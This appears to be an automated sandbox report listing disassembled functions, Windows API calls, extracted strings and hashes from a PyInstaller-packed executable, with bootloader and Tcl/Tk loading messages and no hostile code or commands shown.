                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction ID: fd79366d10eff1426a2f1099dc66648e36f79815a7641e88e24ed06158b605d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7002C130E09F0781FA55FB55A9547B4A3A6EF05758BD040B3E86E0626CEF7CB54AC232
                                                                                                                                                                                                                              Function 00007FF7EAD081D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7EAD086B7,?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0822C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                              • Instruction ID: 27cbb44b4b0018f4524e81f297e685114d20aa569ed7601946d0285ee283ed2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2518311A2964245FA50FB24D8913BEE391EF94788FC44473DA4E826DDEEBCE404C772
                                                                                                                                                                                                                              Function 00007FF7EAD02180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: a8012bd7a016f766f73a3bb871c3bde1a5f8a6b3d9f8da6d8397509c6ea95a9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F651E536604BA186E734DF26E4582BAB7A1F798B65F004132EBDE43698DF7CD045DB20
                                                                                                                                                                                                                              Function 00007FF7EAD080C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction ID: 08d2f0078a2418339bae3794c8e6a015887efc3b0f7d055a356ea95435a0c623
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C219431B08A4281F741EB7AA884379A365EF98B94F984272DA2D4339CDE7CD5518333
                                                                                                                                                                                                                              Function 00007FF7EAD16290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: de9c408c801e32101772736e53160e0a1d31566744e1e5ec98a3828aaa881f07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46126562E0C24386FB24FA24D1547B9B7A2FB60750FC441F7D699866CEDB3CE5408B22
                                                                                                                                                                                                                              Function 00007FF7EAD10FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 2653f5c1d6cf5271562f7af52eaaaad06ad4b670c26ad9377011de4cd82377d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC127361E0C54386FB24EA24A054379F7A5FB60754FC4417BF69A46ACCDB7CED808B22
                                                                                                                                                                                                                              Function 00007FF7EAD01050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                              • Instruction ID: c179b02e8ab817fdc8e10f860ac16882aa3e4fbaf717dbd76427642e37a46e0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB418E61A0865282FA04FB51A8407B9E396FF54B88FC444B3ED4C4778ADE3CE545C362
                                                                                                                                                                                                                              Function 00007FF7EAD01470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                              • Instruction ID: 5b5ed3e474994c15a654b0ec843c4b7f621b2fcb613c033fff18a9adf1a11a26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D417C61A0864286FB10FB21A4817B9E3A1EF44788FC445B3EE4D4BB9DDE7CE541C762
                                                                                                                                                                                                                              Function 00007FF7EAD0EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction ID: 05464cc64c94789c6e6be47188418392d33ad4dfff48b3357dbd55191c3470ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D19132A087418AFB20EB25D4843ADB7A5FB54B8CF900176DE8D5779ACF38E080C752
                                                                                                                                                                                                                              Function 00007FF7EAD02C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction ID: 9ecc6b87ec965c91b67ea067c1b481f8fca2832ff5f007ae2c7cd0bea07cbbb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931B332B08A4142F721EB25A8543AAA796FB88B98F810136EF4D9375DDE3CD546C721
                                                                                                                                                                                                                              Function 00007FF7EAD0DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD4D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD5B
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DD85
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDF3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7EAD0DF7A,?,?,?,00007FF7EAD0DC6C,?,?,?,00007FF7EAD0D869), ref: 00007FF7EAD0DDFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction ID: 2c713b49549d6f197d2fde16d52d0d293cb4c8df6ec7ff3b1af5dffb154b89d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31A121B1A74291FE12EB06A4407B9A395FF48FA8F994577ED5D07388EF7CE4448231
                                                                                                                                                                                                                              Function 00007FF7EAD06360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction ID: 927f537e46426d2aaace940f905dbf842ef3cc4270607b018656d2f6871e6012
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E417121A1CA8691FA21FB20E4943E9A316FF44358FC001B3EA5C4369DEF7CE509C762
                                                                                                                                                                                                                              Function 00007FF7EAD02A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7EAD0351A,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD02AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction ID: f5e54560c04cc6bca7bda04a6944ccef72f7451e5b81d96eeb26d12b1cbd133b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
